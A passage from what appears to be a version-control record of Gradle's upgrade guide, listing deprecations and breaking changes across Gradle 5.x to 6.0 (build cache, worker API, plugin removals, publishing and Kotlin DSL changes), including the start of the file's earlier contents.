separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affect the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and that you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n - Variant 'apiElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n - Variant 'runtimeElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can workaround by disabling this new behavior on the consumer side:\n\n```\njava {\n disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`)\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n validateTaskProperties.getClasses().setFrom(fileCollection)\n validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error prone so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follow the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions are no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n","old_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the <<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other sources sets (e.g. `testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== `IncrementalTaskInputs` has been deprecated\n\nIn Gradle 5.4 we introduced a new API for implementing <<custom_tasks.adoc#incremental_tasks,incremental tasks>>: link:{groovyDslPath}\/org.gradle.work.InputChanges.html[InputChanges].\nIts predecessor `IncrementalTaskInputs` has been deprecated.\n\n==== Forced dependencies\n\nForcing dependency versions using `force = true` on a first-level dependency is deprecated.\nForce has both a semantic and ordering issue which can be avoided by using a <<rich_versions.adoc#rich-version-constraints, strict version constraint>>.\n\n==== Invalid task definitions and configurations\n\nProblems with task definitions are called out in deprecation warnings like this:\n\n```\nProperty 'options.configFile' is not annotated with an input or output annotation. This behaviour has been deprecated and is scheduled to be removed in Gradle 7.0.\n```\n\n==== Search upwards related API in `StartParameter` has been deprecated\n\nIn Gradle 5.0 we removed the `--no-search-upward` CLI parameter.\nThe related APIs in `StartParameter` are now deprecated.\n\n==== `BuildListener#buildStarted` and `Gradle#buildStarted` has been deprecated\n\nThese methods currently do not work as expected.\nThey are being deprecated to avoid confusion.\n\n=== Potential breaking changes\n\n==== Android Gradle Plugin 3.3 and earlier is not supported anymore\n\nGradle 6.0 supports Android Gradle Plugin versions 3.4 and later.\n\n==== Archive tasks fail on duplicate files\n\nUntil now archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can be specify that explicitly:\n\n```\ntask archive(type: Zip) {\n duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n archiveName = 'archive.zip'\n from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as default.\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful to maintain executing build no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will result the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\n[Gradle Module Metadata](https:\/\/blog.gradle.org\/gradle-metadata-1.0), officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nSimilar, for dynamic versions, the `metadata.xml` for the corresponding module needs to be present in a Maven repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`) which usually also does not exist.\nThis often caused large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:supported_metadata_sources,metadata source>>.\n\n==== buildSrc classes are no longer visible from settings scripts\n\nPreviously, the buildSrc project was built before applying the project's settings script and its classes were visible within the script.\nNow, buildSrc is built after the settings script and its classes are not visible to it.\nThe buildSrc classes remain visible to project build scripts and script plugins.\n\nCustom logic can be used from a settings script by <<tutorial_using_tasks.adoc#sec:build_script_external_dependencies, declaring external dependencies>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Plugin validation changes\n\n- The `validateTaskProperties` task is now deprecated, use `validatePlugins` instead.\n The new name better reflects the fact that it also validates artifact transform parameters and other non-property definitions.\n- The `ValidateTaskProperties` type is replaced by `ValidatePlugins`.\n- The `setClasses()` method is now removed. Use `getClasses().setFrom()` instead.\n- The `setClasspath()` method is also removed. use `getClasspath().setFrom()` instead.\n- The link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html#getFailOnWarning--[failOnWarning] option is now enabled by default.\n- The following task validation errors now fail the build at runtime and are promoted to errors for link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins]:\n * A task property is annotated with a property annotation not allowed for tasks, like `@InputArtifact`.\n\n==== `DefaultTask` and `ProjectLayout` methods replaced with `ObjectFactory`\n\nUse `ObjectFactory.fileProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputFile()`\n- `DefaultTask.newOutputFile()`\n- `ProjectLayout.fileProperty()`\n\nUse `ObjectFactory.directoryProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputDirectory()`\n- `DefaultTask.newOutputDirectory()`\n- `ProjectLayout.directoryProperty()`\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== `AbstractCompile.compile()` is gone\n\nThe abstract method `compile()` is no longer declared by `AbstractCompile`.\nTasks extending `AbstractCompile` can implement their own `@TaskAction` method with the name of their choosing.\nThey are also free to add a `@TaskAction` method with an `InputChanges` parameter without having to implement a parameter-less one as well.\n\n==== Using the `embedded-kotlin` plugin now requires a repository\n\nJust like when using the `kotlin-dsl` plugin, it is now required to declare a repository where Kotlin dependencies can be found if you apply the `embedded-kotlin` plugin.\n\n```kotlin\nplugins {\n `embedded-kotlin`\n}\n\nrepositories {\n jcenter()\n}\n```\n\n==== Kotlin DSL IDE support now requires Kotlin IntelliJ Plugin >= 1.3.50\n\nWith Kotlin IntelliJ plugin versions prior to 1.3.50, Kotlin DSL scripts will be wrongly highlighted when the _Gradle JVM_ is set to a version different from the one in _Project SDK_.\nSimply upgrade your IDE plugin to a version >= 1.3.50 to restore the correct Kotlin DSL script highlighting behavior.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\n==== Updates to default integration versions\n\n- Checkstyle has been updated to https:\/\/checkstyle.org\/releasenotes.html#Release_8.24[Checkstyle 8.24].\n- CodeNarc has been updated to https:\/\/github.com\/CodeNarc\/CodeNarc\/blob\/master\/CHANGELOG.md#version-14---may-2019[CodeNarc 1.4].\n- PMD has been updated to https:\/\/pmd.github.io\/latest\/pmd_release_notes.html#28-july-2019---6170[PMD 6.17.0].\n\n==== Javadoc and Groovydoc don't include timestamps by default\n\nTimestamps in the generated documentation have very limited practical use, however they make it impossible to have repeatable documentation builds.\nTherefore, the `Javadoc` and `Groovydoc` tasks are now configured to not include timestamps by default any more.\n\n==== User provided 'config_loc' properties are ignored by Checkstyle\n\nGradle always uses `configDirectory` as the value for 'config_loc' when running Checkstyle.\n\n==== Changing the pom packaging no longer changes the artifact extension\n\nPreviously, the extension of the main artifact published to a Maven repository, typically a _jar_, was changed during publishing if the pom packaging was not _jar_, _ejb_, _bundle_ or _maven-plugin_.\nThis behavior let to broken Gradle Module Metadata and was difficult to understand due to different handling of different packaging types.\nBuild authors can change the artifact name when the artifact is created to obtain the same result as before - e.g. by setting `jar.archiveExtension.set(pomPackaging)`.\n\n==== Ivy.xml published for Java libraries contains more information\n\nA number of fixes were made to produce more correct `ivy.xml` metadata in the `ivy-publish` plugin.\nAs a consequence, the internal structure of the `ivy.xml` file has changed.\nHowever, selecting the `default` configuration yields the same result as before.\nOnly the `runtime` configuration now contains more information which corresponds to the _runtimeElements_ variant of a Java library.\nIn general, users are advised to migrate from `ivy.xml` to the new Gradle Module Metadata format.\n\n==== Executing Gradle without a settings file has been deprecated\n\nA Gradle build is defined by a `settings.gradle[.kts]` file in the current or parent directory.\nWithout a settings file, a Gradle build is undefined and will emit a deprecation warning.\n\nIn Gradle 7.0, Gradle will only allow you to invoke the `init` task or diagnostic command line flags, such as `--version`, with undefined builds.\n\n==== Calling afterEvaluate on an evaluated project has been deprecated\n\nOnce a project is evaluated, Gradle ignores all configuration passed to `Project#afterEvaluate`.\nTo avoid confusion, this scenario will become an error in Gradle 7.0.\nUntil then, a deprecation warning will be shown.\n\n==== Miscellaneous\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation for Groovy now fails the build.\n Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` no longer can inject the metadata or ivy descriptor.\n Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n* The `getEffectiveAnnotationProcessorPath()` method is removed from the `JavaCompile` and `ScalaCompile` tasks.\n* Changing the value of a task property with type `Property<T>` after the task has started execution now results in an error.\n* The `isLegacyLayout()` method is removed from `SourceSetOutput`.\n* The map returned by `TaskInputs.getProperties()` is now unmodifiable.\n Trying to modify it will result in an `UnsupportedOperationException` being thrown.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, then the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle up-to-date checks and build cache lookup\nusing different values to those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy. (e.g. `CompileOnlyCopy2`)\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. This change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n==== File removal operations don't follow symlinked directories\n\nWhen Gradle has to remove the output files of a task for various reasons, it will not follow symlinked directories.\nThe symlink itself will be deleted, but the contents of the linked directory will stay intact.\n\n=== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebu()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n=== Scala 2.9 and Zinc compiler\n\nGradle no longer supports building applications using Scala 2.9.\nThe Zinc compiler has been upgraded to 1.2.5 and requires Scala 2.10.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two build's build-scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 